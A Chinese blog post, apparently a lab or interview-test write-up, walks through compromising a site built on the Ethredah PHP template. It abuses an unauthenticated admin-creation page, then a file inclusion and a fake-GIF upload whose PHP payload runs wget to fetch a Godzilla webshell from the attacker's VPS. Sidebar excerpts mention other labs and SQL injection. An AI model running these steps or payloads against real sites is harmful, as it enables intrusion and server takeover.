Ethredah 站点,渗透测试全解(原创/全网第一篇完整版)

最新推荐文章于 2025-12-08 21:09:06 发布
原创 最新推荐文章于 2025-12-08 21:09:06 发布 · 2.4k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#面试 #职场和发展

开局一个站,装备全靠打,装备可交易,元宝秒到账,大家好我系渣渣辉..........(不好意思走错片场了)

首先网站长这样

 右键查看页面源码,发现有github地址以及模板的名字,话不多说 上github上看看去。

 发现模板作者是这位黑不溜秋的小姐姐。(确实不戳)

 找到了源码下载下来看看

 通过代码审计发现这个new_admin.php目录有存在创建邮箱用户这里没有做验证

 没有验证就好说了,直接找到这个目录,拿出工具构造请求包

在body位置构建参数:

submit      1

email         aaaa@gmail.com

password   123456

直到下面出现 hold on.就说明写入成功

 通过目录扫描到Company_admin/login.php是后台地址

 登陆邮箱aaaa.gmail.com

密码123456

四位数值1027(作者的生日)

输入验证码然后登陆

 找到Create post 目录 点进去找到上传点,经过测试只能上传jpg,png,gif,直接传马儿要被waf拦截(waf凶得很)

 Language这个点位有目录解析

 从../../../../../etc/passwd可以判断这是个linux系统

由于没有成功反弹shell所以通过php的system函数来执行系统下载命令来上马

将哥斯拉生成的目录上传到vps上并开启http服务

python3.7 -m http.server  80

 访问并复制1.php的url

 先使用pwd命令查看当前的绝对路径,知道绝对路径后再使用wget命令冲vps上下载木马

以下为需要包含的php内容命名为1.gif

GIF89a
<?php system("wget http://xxx.xxx.xxx.xxx/1.php ");phpinfo();?>

由于在上传时服务器会检测文件头所以第一行是gif的文件头。

准备工作做完了,现在开始上传图片

 将图片路径复制下来,在到存在文件包含的功能点包含刚刚上传的gif文件

 最后前往vps查看木马已下载成功

 最后访问下载的木马发现木马为报错成功访问

直接使用哥斯拉连接木马,也成功连上

裁决者VK
关注
【最新干货】深信服2021届安服类笔试题
10-28 8008
单选 0x00 weblogic任意文件上传漏洞(CVE-2019-2618),在复现时,用burpsuite提取访问http://127.0.0.1:7001/console的包,并在rejected修改包重放包,修改抓取的包,其POC的路径为:? 0x01 网络安全事件每天时有发生,网络安全设备也在不断的迭代更新,以下哪一种类型的web攻击是当前市面上下一代防火墙几乎没有办法防护的? 0x02 网页被篡改是应急响应中常见的安全问题,造成网页内容发生篡改的应用层原因有哪些? 0x03 使用vi命令编辑
面安服的一道笔试题
wulanlin的博客
12-31 1296
打算找实习了,在boss上投,简单交流后收到回复,试了下,记录下思路和过程。 资产收集 拿到靶机,指纹识别 根据题目提示使用dirsearch进行目录简单扫描,部分结果如下: 找到robot.txt User-agent: * Disallow: /Company_admin/ 访问首页F12查看源码 <!-- author: Ethredah author URL: http://ethredah.github.io --> 找到前端代码作者Ethredah
ethernaut-ctf:Ethernaut CTF解决方案(https
03-31
醚瑙ctf 基于 您可以在notonlyowner.com上找到 安装依赖项 运行npm install来安装Ganache-cli和Truffle 用法 使用npx ganache-cli --port 7545在端口7545上启动ganache-cli 将合同部署到运行npx truffle migrate本地区块链 使用npx truffle exec exploits/<filename>利用npx truffle exec exploits/<filename> 注意:我最初开始将漏洞利用编码为Truffle外部脚本,这就是为什么大多数漏洞利用npx truffle exec 。 另一种完全有效且稍微简单的方法是将漏洞利用构建为。 这是我在“ Privacy之后开始做的事情。
Ethernaut靶场学习实践(一)
m0_68764244的博客
10-03 828
ethernaut靶场分析
Ethernaut 靶场刷题(上)
feng的博客
04-12 3235
前言 看了一下ctfwiki上的,前面的知识点看起来还算不那么费劲,但是突然就是学个几天就开始上手比赛题属实太难了。。。所以先从简单的区块链靶场刷起,循序渐进,慢慢学习区块链的相关知识。 靶场链接: The Ethernaut Hello Ethernaut 算是新手教程了,具体的前面的一些搭建,还有获取Rinkeby环境下的ETH的方式就不说了,靶场上也都说的比较清楚了。用help()可以得到一些常用的帮助,因为异步的问题,我们需要在函数前面加上await。 contract可以查看合约对象: cont
Ethernaut靶场实践(三)
m0_68764244的博客
10-10 1291
首先他要我们前十六位全为我们自己的地址,我们将自己的地址直接转换就可以了,第17-32位全为零,由于uint强转是从后面取,也就是十六进制的第9-12位全为零,而1-8位不全为零,因此我们构造出一个Bytes8的数据,并跟我们的数据进行与运算,即可满足要求。随后调用,然后一步步找到剩余的gas,我们需要找到区块链浏览器中的第二个gas操作,并取该gas-2的值,因为gasleft本身也会消耗gas,再与8191进行mod运算,在初始gas处减少响应的结果,重复2-3次,即可成功,提交实例,攻击完成。
以太Ethernaut靶场打靶—2 Fallout
weixin_49340699的博客
10-26 438
以太Ethernaut靶场打靶—2 Fallout 成功条件 获取合约所有权 源码审计 pragma solidity ^0.6.0; import '@openzeppelin/contracts/math/SafeMath.sol'; contract Fallout { using SafeMath for uint256; mapping (address => uint) allocations; address payable public owner; /*
ethernaut 以太坊靶场学习 (1-12)
weixin_30469895的博客
10-11 1448
前言 这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全 Fallback 给出了源码 pragma solidity ^0.4.18; import 'zeppelin-solidity/contracts/ownership/Ownable.sol'; contract Fallback is Ownable { mapping(address =&...
靶机实战(DC-3)
weixin_45605313的博客
06-30 474
DC-3实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:DC-3 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192
利用SQL漏洞强行登录及防范方法
Daydream
11-02 1466
在用户名为空不输入或随便输入用户名,在密码输入框里用 or= 回车就可以进入人家的系统。典型错误程序如下:private void login_ok_Click(object sender, System.EventArgs e){  string sqlstr="select * from company_admin where username="+username.Text+"
PHP-Blog-Admin:PHP管理员仪表板网站(带有博客部分)
01-28
具有ADMIN和SQL数据库的原生PHP博客 这是一个功能齐全的php应用程序,具有一个网站(包含博客部分)和一个管理控制台,用于监视博客文章,评论,联系人页面中的消息以及新闻订阅者等。 管理仪表盘 入门 下载或克隆项目。 创建一个名为“ Company”或您选择的名称的数据库,然后导入SQL文件{Company.sql} 在db.php中设置数据库凭据 在本地服务器上运行项目 转到登录 使用测试凭证登录 { email : admin@example.com password : 123 } 快乐编码
网络安全-靶场搭建
weixin_48137911的博客
02-13 1641
靶场网盘链接:链接:https://pan.baidu.com/s/1D_GK07H8Q5L-RdDboM6B9Q?靶场就是给你练习用的,因为如果你直接用其他网站搞会把他搞炸的(犯法的)无论后续的什么靶场,放到这个WWW目录即可打开里面对应的网站进行学习。简单概括:把靶场文件放到Phpstudy的网站,放到根目录里面。然后开启mysql和apache,默认下是关闭的。有些靶场是需要使用数据库的,初始化他们的数据库。由于我这个自动翻译了,你们看到的不一定是这样的。要用到之前下载的phpstudy。
company管理系统
qq2209912526的博客
09-27 486
create database company; show databases; create table goods(   id  int  primary key,   name  varchar(20)  Not null,   price float(3,1),   product_time  year,   validity_time tinyint,  address
靶机实战-blogger
ST0new的博客
04-05 4158
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
大模型面试题14:K-means聚类算法全解析(通用场景+深度拓展)
最新发布
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
12-08 651
K-means的核心优势是简单、高效、易工程实现,这使其成为无监督学习中最基础、最常用的算法;但其固有缺陷(K值依赖、对初始值和噪声敏感、簇形状限制等)也决定了它无法直接适用于所有场景。在实际应用中,需根据数据特点和业务需求选择合适的改进算法:含噪声数据选K-medoids,大数据实时场景选Mini-batch K-means,非球形簇选Kernel K-means,模糊归属场景选FCM,K值未知选自适应K-means。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值